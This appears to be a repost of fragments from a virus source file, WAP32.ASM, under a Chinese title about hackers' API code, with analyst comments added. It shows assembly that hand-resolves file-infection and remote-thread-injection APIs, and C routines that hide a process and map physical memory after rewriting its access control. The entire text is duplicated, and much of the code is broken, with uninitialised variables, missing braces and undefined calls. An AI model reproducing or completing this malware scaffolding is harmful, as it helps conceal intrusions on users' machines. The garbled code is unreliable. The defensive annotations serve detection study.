看看黑客用的API代码
file:pudn.com/downloads38/sourcecode/virus/127984/WAP32.ASM
;Kernel32.DLL
; Name list of the Kernel32 API slots this sample resolves at run time.
; Only the labels survive in this copy (the size directives appear to have
; been lost in extraction), so the list does not assemble as-is; the code
; below addresses the slots as [esi.<name>], i.e. as fields of a structure
; that esi points to, and fills them with stosd in LoopRelocKnlApi.
; Analyst's note: FindFirstFileA/FindNextFileA, SetFileAttributesA/SetFileTime
; and the _lopen/_lread/_lwrite/_lcreat family are the file-infection set;
; OpenProcess/VirtualAllocEx/WriteProcessMemory/CreateRemoteThread is the
; remote-thread injection set.  A binary with an empty import table that
; resolves exactly these names by hand is a common static-detection heuristic.
KnlLoadLibraryA
KnlCreateMutexA                 ; used for the single-instance mutex at the end of the page
KnlGetLastError
KnlGetCommandLineA
KnlWinExec
KnlGetDriveTypeA
KnlSetCurrentDirectoryA
KnlFindFirstFileA
KnlFindNextFileA
KnlFindClose
KnlSetFileAttributesA
KnlSetFileTime                  ; restoring timestamps after a write hides the modification from a casual look
KnlLOpen
KnlLRead
KnlLWrite
KnlLSeek
KnlLClose
KnlSleep
KnlRegisterServiceProc          ; RegisterServiceProcess: Windows 9x/ME only, see Hide98Process below
KnlGetCurrentProcessId
KnlOpenProcess
KnlWriteProcessMemory
KnlCreateRemoteThread
KnlCreateKernelThread           ; not a documented kernel32 export name; the author's own slot name, called with CreateThread-shaped arguments below
KnlCloseHandle
KnlWaitForSingleObject
KnlVirtualAllocEx
KnlGetSystemDirectoryA
KnlLCreat
KnlCreateThread
KnlTerminateThread
KnlWideCharToMultiByte
KnlGetComputerNameA
KnlGetSystemTime
LoopRelocKnlApi:
; Slot-resolve loop, one iteration per Kernel32 slot in the table above.
; Register roles as far as this slice shows: ecx = remaining slot count,
; edi = next slot to fill (advanced by stosd), esi = base of the data area,
; ebx = whatever `call ebx` reaches (presumably the resolver; not on this page).
; The routine around this loop starts before this line and continues past the
; final Sleep — only this slice is on the page.
mov ebp,ecx                     ; save the loop counter across the call
call ebx,esi                    ; reads like TASM extended CALL syntax: push esi, call through ebx
cld                             ; stosd must advance edi upward
stosd                           ; store the resolved address (eax) into the slot, edi += 4
mov ecx,ebp // ;Kernel32.dll Api
loop LoopRelocKnlApi            ; loop decrements the counter restored just above
mov eax,[esp.KnlLoadLibraryA]   ; field-style access relative to esp; presumably a copy of the slot table lives on the stack
call PushUser32Str              ; call-over-data idiom: the return address pushed here is the address of the string below
db 'USER32.DLL',0
KnlLoadLibraryA // ;Kernel32.dll Api
; ^ bare symbol; most likely a mangled call through the LoadLibraryA slot — not recoverable from this copy
call [esi.KnlGetCurrentProcessId] // ;Kernel32.dll Api
push eax                        ; eax = own PID, kept live across the next call
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp // ;Kernel32.dll Api
; ^ six arguments in CreateThread order: attrs=0, stack=0, start=ebp, param=eax (own PID), flags=0, lpThreadId=esp
mov [esi.DataRemoteThread],eax // ;VirusData
; ^ the thread handle is kept in the sample's data area and is never closed in this slice
pop eax
call [esi.KnlSleep],500 // ;Kernel32.dll Api
; ^ 500 ms pause before whatever follows
typedef struct _IO_STATUS_BLOCK   // NT native-API definitions, normally from winternl.h/ntdef.h; copied here because ntdll is reached via GetProcAddress
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;   // not referenced anywhere in this fragment
// OBJECT_ATTRIBUTES.Attributes flag values; none of them is used below (attributes.Attributes is set to 0).
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
// ZwOpenSection(SectionHandle, DesiredAccess, ObjectAttributes): opens an existing named section object.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
// RtlInitUnicodeString: fills a UNICODE_STRING from a NUL-terminated wide string (the buffer is referenced, not copied).
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
RTLINITUNICODESTRING RtlInitUnicodeString;   // filled in by InitNTDLL()
ZWOPENSECTION ZwOpenSection;                 // filled in by InitNTDLL()
// IsWindows9x: true on Windows 9x/ME, false on the NT family.
// GetVersion() sets bit 31 on the 9x-class kernels, so any value >= 0x80000000
// means 9x/ME.  Pseudo-code in the original: no braces and no return type.
IsWindows9x(void):
if (GetVersion() < 0x80000000) //NT/2000/XP
return false;
else //9x/ME
return true;
// the test above decides 9x/ME versus NT
// hiding routine
// Hide98Process: marks the current process as a "service" through the 9x/ME-only
// RegisterServiceProcess export, which keeps it out of that OS's task list.
// Defensive notes: the export does not exist on NT-family kernel32, so GetProcAddress
// returns NULL and the call below would fault there; neither hDLL nor the resolved
// pointer is checked; the IsWindows9x() guard is expected to be applied by the caller,
// which is not in this fragment.
Hide98Process(void):
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);   // (dwProcessId, dwType)
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");   // kernel32 is already mapped; this only adds a reference
lpRegisterServiceProcess=(LPREGISTERSERVICEPROCESS)
GetProcAddress(hDLL,"RegisterServiceProcess");   // resolved by name so the binary carries no static import for it
lpRegisterServiceProcess(GetCurrentProcessId(),1);   // 1 = register (RSP_SIMPLE_SERVICE); 0 would unregister
FreeLibrary(hDLL);
// OpenPhysicalMemory: opens the \Device\PhysicalMemory section for read/write and maps
// one 4 KiB page at a version-specific fixed physical address into g_pMapPhysicalMemory.
// Returns g_hMPM (the section handle), or NULL when the OS is not NT 5.0/5.1.
// Defensive notes: this depends on user mode being allowed to open \Device\PhysicalMemory
// at all, which was removed in Windows Server 2003 SP1 and every later release, so the
// technique is dead on current systems.  The STATUS_ACCESS_DENIED path rewrites the
// section object's DACL — object-access auditing on that object is the detection point.
// The status of the second ZwOpenSection and the MapViewOfFile result are never checked.
OpenPhysicalMemory():
{ // implements read/write access to memory through the section
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;   // physical address to map; picked per OS build below
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&g_osvi);
if (5 != g_osvi.dwMajorVersion) return NULL;   // NT 5.x only
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;   // fixed per build; what the caller reads from the mapped page is not in this fragment
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;   // 5.2 (Server 2003) and anything else: refuse
}
// the switch above selects by NT version
// initialise physmemString with the device name \\Device\\PhysicalMemory
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;   // none of the OBJ_* flags defined above
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
// Fallback: reopen with rights to change the DACL, rewrite it (helper not in this fragment), then reopen for mapping.
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);   // defined elsewhere; changes the section object's security descriptor
// rewrite the section's permissions the same way NTFS file permissions are manipulated: GetNamedSecurityInfo, SetNamedSecurityInfo, GetSecurityInfo, SetSecurityInfo
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);   // status not checked afterwards
}
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);   // one page; result not checked
// MapViewOfFile yields the shared view's address; OpenFileMapping could open the same mapping from another process
return g_hMPM;
}
// InitNTDLL: resolves the two ntdll entry points used by OpenPhysicalMemory() into the
// function-pointer globals above.  ntdll is mapped in every process, so LoadLibrary only
// adds a reference (presumably released by CloseNTDLL(), which is not in this fragment).
// No NULL checks on the handle or on either resolved pointer.
InitNTDLL():
{
g_hNtDLL = LoadLibrary("ntdll.dll");
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,"RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");   // by-name resolution of Zw* is itself a common detection heuristic
}
// YHideProcess: driver routine — resolve ntdll, open and map the physical-memory section,
// then release the handle.  Despite the name, nothing in this fragment modifies anything:
// whatever acts on g_pMapPhysicalMemory between OpenPhysicalMemory() and CloseHandle() is absent.
// Defensive notes: the NULL return of OpenPhysicalMemory() (non-5.x OS) is ignored, so
// CloseHandle() runs on whatever g_hMPM held; the mapped view is never unmapped here.
// The opening brace is missing in the original; only the closing one survives.
YHideProcess():
// SetUnhandledExceptionFilter(exeception);   // disabled in the original; presumably a catch-all handler for faults on the mapped page
InitNTDLL();
OpenPhysicalMemory();
CloseHandle(g_hMPM);
CloseNTDLL();   // defined elsewhere
}
// GetData: reads one ULONG of physical memory through the g_hMPM section.
// As written this is not usable code: `phys` is read without ever being assigned
// (presumably meant to be the physical address for `addr`, but no translation is shown),
// the function has no return type and `ret` is computed and then dropped, and the
// MapViewOfFile result is not checked before being indexed.
GetData(PVOID addr)
{
ULONG phys;   // uninitialised — read below
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);   // map the page containing phys
ULONG ret = tmp[(phys & 0xFFF)>>2];   // dword index within that page; never returned
UnmapViewOfFile(tmp);
}
// SetData: writes one ULONG of physical memory through the g_hMPM section.
// Same defects as GetData: `phys` is never assigned, the BOOL return value is never
// produced, and `tmp` is dereferenced without a NULL check.
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys;   // uninitialised — read below
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);   // map the page containing phys
tmp[(phys & 0xFFF)>>2] = data;   // dword index within that page
UnmapViewOfFile(tmp);
}
HideProcess();   // not defined on this page (only YHideProcess and Hide98Process are); which variant it dispatches to is not shown
bool bFound;   // never initialised; only ever set to TRUE
HANDLE hMutexOneInstantance=CreateMutex(NULL,TRUE,_T("cyh")); // create the mutex
if(GetLastError()==ERROR_ALREADY_EXISTS) bFound=TRUE; // only one process instance
if(hMutexOneInstantance) ReleaseMutex(hMutexOneInstantance);   // ownership dropped immediately; the handle is never closed here
// Defensive note: the named mutex "cyh" is a host-based indicator for this sample —
// an existing mutex of that name means an instance is already running.
file:pudn.com/downloads38/sourcecode/virus/127984/WAP32.ASM
;Kernel32.DLL
; Name list of the Kernel32 API slots this sample resolves at run time.
; Only the labels survive in this copy (the size directives appear to have
; been lost in extraction), so the list does not assemble as-is; the code
; below addresses the slots as [esi.<name>], i.e. as fields of a structure
; that esi points to, and fills them with stosd in LoopRelocKnlApi.
; Analyst's note: FindFirstFileA/FindNextFileA, SetFileAttributesA/SetFileTime
; and the _lopen/_lread/_lwrite/_lcreat family are the file-infection set;
; OpenProcess/VirtualAllocEx/WriteProcessMemory/CreateRemoteThread is the
; remote-thread injection set.  A binary with an empty import table that
; resolves exactly these names by hand is a common static-detection heuristic.
KnlLoadLibraryA
KnlCreateMutexA                 ; used for the single-instance mutex at the end of the page
KnlGetLastError
KnlGetCommandLineA
KnlWinExec
KnlGetDriveTypeA
KnlSetCurrentDirectoryA
KnlFindFirstFileA
KnlFindNextFileA
KnlFindClose
KnlSetFileAttributesA
KnlSetFileTime                  ; restoring timestamps after a write hides the modification from a casual look
KnlLOpen
KnlLRead
KnlLWrite
KnlLSeek
KnlLClose
KnlSleep
KnlRegisterServiceProc          ; RegisterServiceProcess: Windows 9x/ME only, see Hide98Process below
KnlGetCurrentProcessId
KnlOpenProcess
KnlWriteProcessMemory
KnlCreateRemoteThread
KnlCreateKernelThread           ; not a documented kernel32 export name; the author's own slot name, called with CreateThread-shaped arguments below
KnlCloseHandle
KnlWaitForSingleObject
KnlVirtualAllocEx
KnlGetSystemDirectoryA
KnlLCreat
KnlCreateThread
KnlTerminateThread
KnlWideCharToMultiByte
KnlGetComputerNameA
KnlGetSystemTime
LoopRelocKnlApi:
; Slot-resolve loop, one iteration per Kernel32 slot in the table above.
; Register roles as far as this slice shows: ecx = remaining slot count,
; edi = next slot to fill (advanced by stosd), esi = base of the data area,
; ebx = whatever `call ebx` reaches (presumably the resolver; not on this page).
; The routine around this loop starts before this line and continues past the
; final Sleep — only this slice is on the page.
mov ebp,ecx                     ; save the loop counter across the call
call ebx,esi                    ; reads like TASM extended CALL syntax: push esi, call through ebx
cld                             ; stosd must advance edi upward
stosd                           ; store the resolved address (eax) into the slot, edi += 4
mov ecx,ebp // ;Kernel32.dll Api
loop LoopRelocKnlApi            ; loop decrements the counter restored just above
mov eax,[esp.KnlLoadLibraryA]   ; field-style access relative to esp; presumably a copy of the slot table lives on the stack
call PushUser32Str              ; call-over-data idiom: the return address pushed here is the address of the string below
db 'USER32.DLL',0
KnlLoadLibraryA // ;Kernel32.dll Api
; ^ bare symbol; most likely a mangled call through the LoadLibraryA slot — not recoverable from this copy
call [esi.KnlGetCurrentProcessId] // ;Kernel32.dll Api
push eax                        ; eax = own PID, kept live across the next call
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp // ;Kernel32.dll Api
; ^ six arguments in CreateThread order: attrs=0, stack=0, start=ebp, param=eax (own PID), flags=0, lpThreadId=esp
mov [esi.DataRemoteThread],eax // ;VirusData
; ^ the thread handle is kept in the sample's data area and is never closed in this slice
pop eax
call [esi.KnlSleep],500 // ;Kernel32.dll Api
; ^ 500 ms pause before whatever follows
typedef struct _IO_STATUS_BLOCK   // NT native-API definitions, normally from winternl.h/ntdef.h; copied here because ntdll is reached via GetProcAddress
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;   // not referenced anywhere in this fragment
// OBJECT_ATTRIBUTES.Attributes flag values; none of them is used below (attributes.Attributes is set to 0).
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
// ZwOpenSection(SectionHandle, DesiredAccess, ObjectAttributes): opens an existing named section object.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
// RtlInitUnicodeString: fills a UNICODE_STRING from a NUL-terminated wide string (the buffer is referenced, not copied).
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
RTLINITUNICODESTRING RtlInitUnicodeString;   // filled in by InitNTDLL()
ZWOPENSECTION ZwOpenSection;                 // filled in by InitNTDLL()
// IsWindows9x: true on Windows 9x/ME, false on the NT family.
// GetVersion() sets bit 31 on the 9x-class kernels, so any value >= 0x80000000
// means 9x/ME.  Pseudo-code in the original: no braces and no return type.
IsWindows9x(void):
if (GetVersion() < 0x80000000) //NT/2000/XP
return false;
else //9x/ME
return true;
// the test above decides 9x/ME versus NT
// hiding routine
// Hide98Process: marks the current process as a "service" through the 9x/ME-only
// RegisterServiceProcess export, which keeps it out of that OS's task list.
// Defensive notes: the export does not exist on NT-family kernel32, so GetProcAddress
// returns NULL and the call below would fault there; neither hDLL nor the resolved
// pointer is checked; the IsWindows9x() guard is expected to be applied by the caller,
// which is not in this fragment.
Hide98Process(void):
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);   // (dwProcessId, dwType)
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");   // kernel32 is already mapped; this only adds a reference
lpRegisterServiceProcess=(LPREGISTERSERVICEPROCESS)
GetProcAddress(hDLL,"RegisterServiceProcess");   // resolved by name so the binary carries no static import for it
lpRegisterServiceProcess(GetCurrentProcessId(),1);   // 1 = register (RSP_SIMPLE_SERVICE); 0 would unregister
FreeLibrary(hDLL);
// OpenPhysicalMemory: opens the \Device\PhysicalMemory section for read/write and maps
// one 4 KiB page at a version-specific fixed physical address into g_pMapPhysicalMemory.
// Returns g_hMPM (the section handle), or NULL when the OS is not NT 5.0/5.1.
// Defensive notes: this depends on user mode being allowed to open \Device\PhysicalMemory
// at all, which was removed in Windows Server 2003 SP1 and every later release, so the
// technique is dead on current systems.  The STATUS_ACCESS_DENIED path rewrites the
// section object's DACL — object-access auditing on that object is the detection point.
// The status of the second ZwOpenSection and the MapViewOfFile result are never checked.
OpenPhysicalMemory():
{ // implements read/write access to memory through the section
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;   // physical address to map; picked per OS build below
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&g_osvi);
if (5 != g_osvi.dwMajorVersion) return NULL;   // NT 5.x only
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;   // fixed per build; what the caller reads from the mapped page is not in this fragment
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;   // 5.2 (Server 2003) and anything else: refuse
}
// the switch above selects by NT version
// initialise physmemString with the device name \\Device\\PhysicalMemory
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;   // none of the OBJ_* flags defined above
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
// Fallback: reopen with rights to change the DACL, rewrite it (helper not in this fragment), then reopen for mapping.
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);   // defined elsewhere; changes the section object's security descriptor
// rewrite the section's permissions the same way NTFS file permissions are manipulated: GetNamedSecurityInfo, SetNamedSecurityInfo, GetSecurityInfo, SetSecurityInfo
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);   // status not checked afterwards
}
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);   // one page; result not checked
// MapViewOfFile yields the shared view's address; OpenFileMapping could open the same mapping from another process
return g_hMPM;
}
// InitNTDLL: resolves the two ntdll entry points used by OpenPhysicalMemory() into the
// function-pointer globals above.  ntdll is mapped in every process, so LoadLibrary only
// adds a reference (presumably released by CloseNTDLL(), which is not in this fragment).
// No NULL checks on the handle or on either resolved pointer.
InitNTDLL():
{
g_hNtDLL = LoadLibrary("ntdll.dll");
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,"RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");   // by-name resolution of Zw* is itself a common detection heuristic
}
// YHideProcess: driver routine — resolve ntdll, open and map the physical-memory section,
// then release the handle.  Despite the name, nothing in this fragment modifies anything:
// whatever acts on g_pMapPhysicalMemory between OpenPhysicalMemory() and CloseHandle() is absent.
// Defensive notes: the NULL return of OpenPhysicalMemory() (non-5.x OS) is ignored, so
// CloseHandle() runs on whatever g_hMPM held; the mapped view is never unmapped here.
// The opening brace is missing in the original; only the closing one survives.
YHideProcess():
// SetUnhandledExceptionFilter(exeception);   // disabled in the original; presumably a catch-all handler for faults on the mapped page
InitNTDLL();
OpenPhysicalMemory();
CloseHandle(g_hMPM);
CloseNTDLL();   // defined elsewhere
}
// GetData: reads one ULONG of physical memory through the g_hMPM section.
// As written this is not usable code: `phys` is read without ever being assigned
// (presumably meant to be the physical address for `addr`, but no translation is shown),
// the function has no return type and `ret` is computed and then dropped, and the
// MapViewOfFile result is not checked before being indexed.
GetData(PVOID addr)
{
ULONG phys;   // uninitialised — read below
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);   // map the page containing phys
ULONG ret = tmp[(phys & 0xFFF)>>2];   // dword index within that page; never returned
UnmapViewOfFile(tmp);
}
// SetData: writes one ULONG of physical memory through the g_hMPM section.
// Same defects as GetData: `phys` is never assigned, the BOOL return value is never
// produced, and `tmp` is dereferenced without a NULL check.
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys;   // uninitialised — read below
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);   // map the page containing phys
tmp[(phys & 0xFFF)>>2] = data;   // dword index within that page
UnmapViewOfFile(tmp);
}
HideProcess();   // not defined on this page (only YHideProcess and Hide98Process are); which variant it dispatches to is not shown
bool bFound;   // never initialised; only ever set to TRUE
HANDLE hMutexOneInstantance=CreateMutex(NULL,TRUE,_T("cyh")); // create the mutex
if(GetLastError()==ERROR_ALREADY_EXISTS) bFound=TRUE; // only one process instance
if(hMutexOneInstantance) ReleaseMutex(hMutexOneInstantance);   // ownership dropped immediately; the handle is never closed here
// Defensive note: the named mutex "cyh" is a host-based indicator for this sample —
// an existing mutex of that name means an instance is already running.